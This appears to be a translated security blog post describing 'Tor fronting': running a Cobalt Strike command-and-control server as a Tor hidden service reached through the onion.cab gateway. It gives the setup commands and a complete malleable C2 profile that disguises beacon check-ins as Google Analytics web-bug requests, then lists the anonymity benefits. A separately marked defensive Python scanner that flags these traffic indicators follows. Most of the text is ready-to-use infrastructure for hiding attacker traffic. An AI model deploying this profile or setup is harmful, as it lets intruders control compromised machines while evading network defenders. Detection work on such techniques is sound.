This article covers: Concealed Attacks - Tor Fronting
0x01 Introduction
lsb_release -a
deb http://deb.torproject.org/torproject.org precise main
deb-src http://deb.torproject.org/torproject.org precise main
gpg --keyserver keys.gnupg.net --recv A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89
gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -
$ sudo apt-get update
$ sudo apt-get install tor deb.torproject.org-keyring
HiddenServiceDir /var/lib/tor/hidden_service/
HiddenServicePort 80 127.0.0.1:8080
sudo service tor restart
sudo cat /var/lib/tor/hidden_service/hostname
~ cd /tmp
~ python -m SimpleHTTPServer 8080
Serving HTTP on 0.0.0.0 port 8080 ...
curl -b 'onion_cab_iKnowShit=yourcookie' 'https://xxxx.onion.cab/1.txt'
# make our C2 look like a Google Web Bug
# https://developers.google.com/analytics/resources/articles/gaTrackingTroubleshooting
#
# Author: @armitagehacker
# Modified by Vincent Yiu @vysecurity for TOR.

set sleeptime "5000";

http-get {
    set uri "/___utm";
    client {
        header "Host" "bjaw6h36vwruhwvb.onion.cab";
        header "Cookie" "onion_cab_iKnowShit=8919090b066c57c2638a0956e1af4e8d";
        metadata {
            base64url;
            prepend "__utma";
            parameter "utmcc";
        }
    }
    server {
        header "Content-Type" "plain/text";
        output {
            # hexdump pixel.gif
            # 0000000 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00
            # 0000010 ff ff ff 21 f9 04 01 00 00 00 00 2c 00 00 00 00
            # 0000020 01 00 01 00 00 02 01 44 00 3b
            prepend "\x01\x00\x01\x00\x00\x02\x01\x44\x00\x3b";
            prepend "\xff\xff\xff\x21\xf9\x04\x01\x00\x00\x00\x2c\x00\x00\x00\x00";
            prepend "\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00\x00\x00";
            print;
        }
    }
}

http-post {
    set uri "/__utm";
    set verb "GET";
    client {
        header "Host" "bjaw6h36vwruhwvb.onion.cab";
        header "Cookie" "onion_cab_iKnowShit=8919090b066c57c2638a0956e1af4e8d";
        id {
            prepend "UA-220";
            append "-2";
            parameter "utmac";
        }
        output {
            base64url;
            prepend "__utma";
            parameter "utmcc";
        }
    }
    server {
        header "Content-Type" "plain/text";
        output {
            prepend "\x01\x00\x01\x00\x00\x02\x01\x44\x00\x3b";
            prepend "\xff\xff\xff\x21\xf9\x04\x01\x00\x00\x00\x2c\x00\x00\x00\x00";
            prepend "\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00\x00\x00";
            print;
        }
    }
}

# dress up the staging process too
http-stager {
    server {
        header "Content-Type" "plain/text";
    }
}
sudo ./teamserver [your ip] hacktest tor-fronting.profile
1. You do not need a public-facing network environment; the C2 can run in Docker or locally (but the server must be outside the Great Firewall).
2. It makes the C2 anonymous.
3. Tor does not need to be installed on the target machine.
4. It is secure by default.
5. It requires both Cobalt Strike and the Tor service to be installed on the C2.
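As an added defender's example (not from the original post or its author), the scanner below runs over constructed proxy log lines and flags the traces this setup leaves in outbound HTTP traffic: a Host header for the onion.cab tor2web gateway, the onion_cab_iKnowShit cookie, and the web-bug style /__utm and /___utm paths answered with a Content-Type other than image/gif (the profile above labels its GIF bytes "plain/text"). The tab-separated log format and the sample lines are assumptions made for the example.

```python
import re
from typing import Dict, List

# Constructed sample lines in a hypothetical tab-separated proxy log format:
# time, client, method, host, path, request Cookie header, response Content-Type.
SAMPLE_LOG = (
    "2017-03-06T10:00:01Z\t10.0.0.7\tGET\tbjaw6h36vwruhwvb.onion.cab\t/___utm?utmcc=__utmaAAAA\t"
    "onion_cab_iKnowShit=8919090b066c57c2638a0956e1af4e8d\tplain/text\n"
    "2017-03-06T10:00:06Z\t10.0.0.7\tGET\tbjaw6h36vwruhwvb.onion.cab\t/__utm?utmac=UA-220AAAA-2&utmcc=__utmaBBBB\t"
    "onion_cab_iKnowShit=8919090b066c57c2638a0956e1af4e8d\tplain/text\n"
    "2017-03-06T10:00:09Z\t10.0.0.8\tGET\twww.google-analytics.com\t/__utm.gif?utmac=UA-1234-1\t-\timage/gif\n"
    "2017-03-06T10:00:12Z\t10.0.0.9\tGET\texample.com\t/index.html\tsession=abc\ttext/html\n"
)

TOR2WEB_SUFFIXES = (".onion.cab",)                      # the tor2web gateway used in the post
TOR2WEB_COOKIE = re.compile(r"\bonion_cab_iKnowShit=")  # onion.cab consent cookie
WEBBUG_PATH = re.compile(r"^/_{2,3}utm(\?|$)")          # /__utm and /___utm from the profile

def classify(line: str) -> List[str]:
    """Return the indicator names matched by one log line."""
    fields = line.rstrip("\n").split("\t")
    if len(fields) != 7:
        return ["malformed"]
    _, _, _, host, path, cookie, ctype = fields
    hits: List[str] = []
    if host.lower().endswith(TOR2WEB_SUFFIXES):
        hits.append("tor2web_gateway_host")
    if TOR2WEB_COOKIE.search(cookie):
        hits.append("onion_cab_consent_cookie")
    # The profile answers web-bug paths with GIF bytes but labels them "plain/text":
    # a web-bug URI whose response is not image/gif is worth a second look.
    if WEBBUG_PATH.match(path) and ctype.lower() != "image/gif":
        hits.append("webbug_path_content_type_mismatch")
    return hits

def scan(log_text: str) -> Dict[str, List[str]]:
    """Map each client that triggered an indicator to the distinct indicators seen."""
    report: Dict[str, List[str]] = {}
    for line in log_text.splitlines():
        if not line.strip():
            continue
        hits = classify(line)
        if not hits or hits == ["malformed"]:
            continue  # clean or unparseable line; nothing to attribute
        client = line.split("\t")[1]
        seen = report.setdefault(client, [])
        seen.extend([h for h in hits if h not in seen])
    return report
```

Running scan(SAMPLE_LOG) attributes all three indicators to 10.0.0.7 and nothing to the genuine Google Analytics request from 10.0.0.8.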
Original publication date: March 6, 2017
Author: Evi1cg
This article comes from 嘶吼, a partner of the Yunqi Community (云栖社区); see the 嘶吼 website for related information.